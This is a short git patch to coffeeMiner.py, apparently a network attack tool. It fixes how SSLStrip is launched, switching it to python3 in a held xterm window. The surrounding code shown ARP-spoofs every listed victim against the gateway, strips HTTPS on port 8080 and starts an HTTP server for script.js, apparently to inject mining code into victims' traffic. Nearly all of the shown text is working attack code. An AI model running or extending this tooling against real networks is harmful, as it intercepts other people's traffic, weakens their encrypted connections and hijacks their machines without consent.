From 786b670f3441b2c9a9f0482415bb80226ece4966 Mon Sep 17 00:00:00 2001 From: Chase Taylor Date: Mon, 8 Jan 2018 20:25:39 -0700 Subject: [PATCH] Fix: Use xterm -hold -e and python3 for SSLStrip --- coffeeMiner.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/coffeeMiner.py b/coffeeMiner.py index f47cd8a..5c869fb 100644 --- a/coffeeMiner.py +++ b/coffeeMiner.py @@ -41,7 +41,7 @@ for victim in victims: os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") # run SSLStrip on port 8080 -os.system("python sslstrip2/sslstrip.py -l 8080 &") +os.system("xterm -hold -e 'python3 sslstrip2/sslstrip.py -l 8080' &") # start the http server for serving the script.js, in a new console os.system("xterm -hold -e 'python3 httpServer.py' &")